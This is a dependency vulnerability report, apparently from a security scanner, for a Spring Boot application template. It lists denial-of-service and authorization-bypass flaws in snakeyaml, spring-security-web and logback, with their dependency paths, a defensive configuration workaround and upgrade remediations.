  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-38749

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-25857

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

high severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.6.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass via forward or include dispatcher types.

An application is vulnerable when all of the following are true:

  1. The application expects that Spring Security applies security to forward and include dispatcher types.

  2. The application uses the AuthorizationFilter either manually or via the authorizeHttpRequests() method.

  3. The application configures the FilterChainProxy to apply to forward and/or include requests (e.g. spring.security.filter.dispatcher-types = request, error, async, forward, include).

  4. The application may forward or include the request to a higher privilege-secured endpoint.

  5. The application configures Spring Security to apply to every dispatcher type via authorizeHttpRequests().shouldFilterAllDispatcherTypes(true)

An application is not vulnerable if any of the following is true:

  1. The application does not use authorizeHttpRequests() or the AuthorizationFilter.

  2. The application does not forward/include requests.

  3. The application does not need to configure Spring Security to apply to FORWARD and INCLUDE dispatcher types.

Workaround

Users who are unable to upgrade should use AuthorizeRequests().filterSecurityInterceptorOncePerRequest(false) instead of AuthorizeHttpRequests().shouldFilterAllDispatcherTypes(true).

Users with version < 5.7.0 which does not have shouldFilterAllDispatcherTypes available, should add an ObjectPostProcessor:

authorizeHttpRequests().withObjectPostProcessor(new 
 ObjectPostProcessor<AuthorizationFilter>() {
   @Override 
   public<O extends AuthorizationFilter> O postProcess(O filter) { 
    filter.setObserveOncePerRequest(false); 
    filter.setFilterAsyncDispatch(true); 
    filter.setFilterErrorDispatch(true); 
    return filter;
   }});

Note:

In Spring Security 5, the default behavior is to not apply the filters more than once to a request, therefore users have to explicitly configure Spring Security to do that. In addition, the FilterChainProxy is also not configured to be invoked on forward and include dispatcher types.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.6.9, 5.7.5 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: ch.qos.logback:logback-classic
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.7.

Overview

ch.qos.logback:logback-classic is a reliable, generic, fast and flexible logging library for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can mount a denial-of-service attack by sending poisoned data. This is only exploitable if logback receiver component is deployed.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade ch.qos.logback:logback-classic to version 1.2.13, 1.3.12, 1.4.12 or higher.

References

high severity

Uncontrolled Resource Consumption ('Resource Exhaustion')

  • Vulnerable module: ch.qos.logback:logback-classic
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.7.

Overview

ch.qos.logback:logback-classic is a reliable, generic, fast and flexible logging library for Java.

Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') via the logback receiver component. An attacker can mount a denial-of-service attack by sending poisoned data.

Note:

Successful exploitation requires the logback-receiver component being enabled and also reachable by the attacker.

Remediation

Upgrade ch.qos.logback:logback-classic to version 1.2.13, 1.3.14, 1.4.14 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.7.

Overview

ch.qos.logback:logback-core is a logback-core module.

Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can mount a denial-of-service attack by sending poisoned data. This is only exploitable if logback receiver component is deployed.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade ch.qos.logback:logback-core to version 1.2.13, 1.3.12, 1.4.12 or higher.

References

high severity

Uncontrolled Resource Consumption ('Resource Exhaustion')

  • Vulnerable module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.1.7.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.1.7.
